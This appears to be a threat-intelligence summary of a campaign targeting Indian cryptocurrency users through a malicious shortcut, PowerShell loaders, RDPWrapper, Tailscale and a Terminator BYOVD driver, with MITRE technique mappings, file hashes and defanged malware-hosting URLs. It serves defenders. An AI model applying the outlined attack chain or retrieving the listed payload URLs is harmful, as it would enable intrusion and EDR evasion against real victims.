Cyble Research and Intelligence Labs (CRIL) uncovered a multi-stage campaign that starts with a Zip file containing a malicious shortcut (.lnk) which, when opened, downloads a PowerShell payload to grant RDP access. The threat actor uses RDPWrapper and Tailscale to reach the victim’s network, employs a Windows BYOVD plan with Terminator, and drops a Go-based loader alongside a decoy PDF focused on Indian crypto trading to target cryptocurrency users. #Terminator #Tailscale
Keypoints
- Campaign begins with a Zip file containing a malicious .lnk shortcut; execution by the user triggers the attack chain.
- Executing the shortcut downloads a PowerShell script that ultimately provides the Threat Actor (TA) with RDP access to the victim’s system.
- Infection chain includes PowerShell, batch files, Go-based binaries, and a BYOVD-capable Terminator driver (Spyboy).
- TA plans a Windows BYOVD attack using Terminator.sys and Zemana kernel drivers, potentially enabling AV/EDR bypass.
- RDPWrapper and Tailscale are used to establish remote access and connect to the TA’s private network.
- Decoy PDFs (CoinDCX-related) indicate a crypto-focused target, with India as a geographic focus; same decoy linked to StealC chain.
- Loader chain drops binaries, performs registry and UAC checks, and uses mutexes to ensure single-instance execution.
MITRE Techniques
- [T1204] User Execution – The .lnk file requires user to execute it. ‘.lnk file requires user to execute it.’
- [T1059] Command and Scripting Interpreter – Uses PowerShell and Batch scripts. ‘Uses PowerShell and Batch scripts.’
- [T1547.001] Registry Run Keys / Startup Folder – Creates a start menu entry (Start MenuProgramsStartup). ‘Creates a start menu entry (Start MenuProgramsStartup)’
- [T1133] External Remote Services – Uses Tailscale and RDPWrapper. ‘Uses Tailscale and RDPWrapper’
- [T1548] Abuse Elevation Control – Bypass User Account Control. ‘Bypass User Account Control’
- [T1134.001] Access Token Manipulation – Uses runas command. ‘Uses runas command.’
- [T1027] Obfuscated Files or Information – Use XOR encrypted PowerShell script. ‘Use XOR encrypted PowerShell script.’
- [T1070.004] Indicator Removal on Host – Deletes batch script. ‘Deletes batch script.’
- [T1057] Process Discovery – Queries a list of all running processes. ‘Queries a list of all running processes.’
- [T1518.001] Security Software Discovery – May try to detect the virtual machine to hinder analysis. ‘May try to detect the virtual machine to hinder analysis’
- [T1219] Remote Access Software – Uses RDPWrapper and Tailscale. ‘Uses RDPWrapper and Tailscale.’
Indicators of Compromise
- [Hash] File hashes – 29c30a709d40929e2f75190c8dfe5bc6e2e57c3ad9f317604802604f36e23946, fc94bba834b8f695322a9ffa4040676f8e88c2c9ca267c793f86c04b3f6ceac9, and 7 more hashes
- [Hash] File hashes – 07c9aaa69901be5990bbb084bf26f74de7094ab25c34968898edefae9ea15fc7, 1bb5fbb1521558440aea448422dcf911ca81ae8936011caa444eb1adb95743cb, and 0 more hashes
- [Hash] File hashes – 4076564c6a199e8809f9a2a0ff2e3ad96fa5fa9283b410a4731ea196c2783531, 61b3d8aae0803455432b65db40fef4e92749491bbd98c07eefec8aed636a4c48, and 0 more hashes
- [Hash] File hashes – 543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91, f7224264aef52f80f5df9068e2f0ebcd1961dd39aa87acb79b3b67b7e5c8f2d1, and 0 more hashes
- [Hash] File hashes – f808ed40113b30deb348fba32f60236acf160c9bb95cdd42099a24ee2dc31076, and 0 more hashes
- [URL] Malicious URLs – hxxps[:]//cloudflareupdate.co/XmSI.txt, hxxp[:]//microsoft-windows.cloud/adr.exe, and 3 more URLs
- [URL] Malicious URLs – hxxp[:]//microsoft-windows.cloud/Terminator.sys, hxxp[:]//microsoft-windows.cloud/main.exe, and 2 more URLs
- [URL] Malicious URLs – hxxps[:]//cloudflareupdate.co/XBIb.txt, and 1 more URL